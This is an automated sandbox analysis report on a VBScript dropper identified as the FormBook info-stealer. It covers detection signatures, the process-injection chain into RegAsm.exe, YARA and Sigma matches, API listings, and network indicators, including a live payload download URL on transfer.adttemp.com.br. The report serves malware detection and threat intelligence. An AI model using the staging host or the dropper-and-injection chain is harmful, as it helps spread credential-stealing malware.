Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TRANSFERENCIAS.vbs

Overview

General Information

Sample name:TRANSFERENCIAS.vbs
Analysis ID:1525551
MD5:36785fe79d41b73fae95c26d6f64186d
SHA1:9a2d9296673086220e25c622c059ba1a7b65dd89
SHA256:434e6d3b448f48a98ef5dc955d51c05b8e136c40fda5f6b8cff698eab989ad07
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 360 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • temp_executable.exe (PID: 4460 cmdline: "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" MD5: 1774855B0E8A12C20A7A321D995FA17A)
      • RegAsm.exe (PID: 7272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 7280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c1b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1425f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        10.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        10.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          10.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16542:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", ProcessId: 360, ProcessName: wscript.exe
          Sigma detected: Use Short Name Path in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\temp_executable.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\temp_executable.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\temp_executable.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 360, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" , ProcessId: 4460, ProcessName: temp_executable.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", ProcessId: 360, ProcessName: wscript.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAvira: detection malicious, Label: TR/Dropper.Gen
          Multi AV Scanner detection for domain / URL
          Source: transfer.adttemp.com.brVirustotal: Detection: 5%Perma Link
          Source: http://transfer.adttemp.com.brVirustotal: Detection: 5%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.1324624644.000002387ED7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318550574.000002387ED7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1319390729.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318437273.000002387EA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1324207380.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318568461.000002387EA8C000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

          Networking

          barindex
          Potential malicious VBS script found (has network functionality)
          Source: Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file
          Source: global trafficHTTP traffic detected: GET /qbDh2/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /qbDh2/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: transfer.adttemp.com.br
          Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.adttemp.com.br
          Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.adttemp.com.brd
          Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br
          Source: wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe, 00000008.00000002.1315543440.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe.0.drString found in binary or memory: https://transfer.adttemp.com.br/qbDh2/sirdeeeeee.txt
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.7:49700 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042C563 NtClose,10_2_0042C563
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F335C0 NtCreateMutant,LdrInitializeThunk,10_2_02F335C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_02F32C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_02F32DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F34340 NtSetContextThread,10_2_02F34340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F33090 NtSetValueKey,10_2_02F33090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F33010 NtOpenDirectoryObject,10_2_02F33010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F34650 NtSuspendThread,10_2_02F34650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32AF0 NtWriteFile,10_2_02F32AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32AD0 NtReadFile,10_2_02F32AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32AB0 NtWaitForSingleObject,10_2_02F32AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32BF0 NtAllocateVirtualMemory,10_2_02F32BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32BE0 NtQueryValueKey,10_2_02F32BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32BA0 NtEnumerateValueKey,10_2_02F32BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32B80 NtQueryInformationFile,10_2_02F32B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32B60 NtClose,10_2_02F32B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F339B0 NtGetContextThread,10_2_02F339B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32EE0 NtQueueApcThread,10_2_02F32EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32EA0 NtAdjustPrivilegesToken,10_2_02F32EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32E80 NtReadVirtualMemory,10_2_02F32E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32E30 NtWriteVirtualMemory,10_2_02F32E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32FE0 NtCreateFile,10_2_02F32FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32FB0 NtResumeThread,10_2_02F32FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32FA0 NtQuerySection,10_2_02F32FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32F90 NtProtectVirtualMemory,10_2_02F32F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32F60 NtCreateProcessEx,10_2_02F32F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32F30 NtCreateSection,10_2_02F32F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32CF0 NtOpenProcess,10_2_02F32CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32CC0 NtQueryVirtualMemory,10_2_02F32CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32CA0 NtQueryInformationToken,10_2_02F32CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32C60 NtCreateKey,10_2_02F32C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32C00 NtQueryInformationProcess,10_2_02F32C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32DD0 NtDelayExecution,10_2_02F32DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32DB0 NtEnumerateKey,10_2_02F32DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F33D70 NtOpenThread,10_2_02F33D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32D30 NtUnmapViewOfSection,10_2_02F32D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32D10 NtMapViewOfSection,10_2_02F32D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F33D10 NtOpenProcessToken,10_2_02F33D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F32D00 NtSetInformationFile,10_2_02F32D00
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 8_2_013C19308_2_013C1930
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 8_2_013C35588_2_013C3558
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 8_2_013C354A8_2_013C354A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040235010_2_00402350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042EB8310_2_0042EB83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040FCFB10_2_0040FCFB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040448610_2_00404486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040FD0310_2_0040FD03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00402E6010_2_00402E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004166B310_2_004166B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040FF2310_2_0040FF23
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040DFA310_2_0040DFA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C010_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F052A010_2_02F052A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA027410_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E3F010_2_02F0E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC03E610_2_02FC03E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F4739A10_2_02F4739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EED34C10_2_02EED34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBA35210_2_02FBA352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB132D10_2_02FB132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB70E910_2_02FB70E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBF0E010_2_02FBF0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C010_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAF0CC10_2_02FAF0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB81CC10_2_02FB81CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0B1B010_2_02F0B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC01AA10_2_02FC01AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FCB16B10_2_02FCB16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEF17210_2_02EEF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F3516C10_2_02F3516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F8815810_2_02F88158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9A11810_2_02F9A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF010010_2_02EF0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1C6E010_2_02F1C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB16CC10_2_02FB16CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFC7C010_2_02EFC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBF7B010_2_02FBF7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0077010_2_02F00770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2475010_2_02F24750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAE4F610_2_02FAE4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF146010_2_02EF1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB244610_2_02FB2446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBF43F10_2_02FBF43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9D5B010_2_02F9D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC059110_2_02FC0591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB757110_2_02FB7571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0053510_2_02F00535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FADAC610_2_02FADAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F45AA010_2_02F45AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9DAAC10_2_02F9DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFEA8010_2_02EFEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F73A6C10_2_02F73A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBFA4910_2_02FBFA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB7A4610_2_02FB7A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F75BF010_2_02F75BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F3DBF910_2_02F3DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB6BD710_2_02FB6BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1FB8010_2_02F1FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBFB7610_2_02FBFB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBAB4010_2_02FBAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2E8F010_2_02F2E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F038E010_2_02F038E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE68B810_2_02EE68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0284010_2_02F02840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0A84010_2_02F0A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6D80010_2_02F6D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F029A010_2_02F029A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FCA9A610_2_02FCA9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1696210_2_02F16962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0995010_2_02F09950
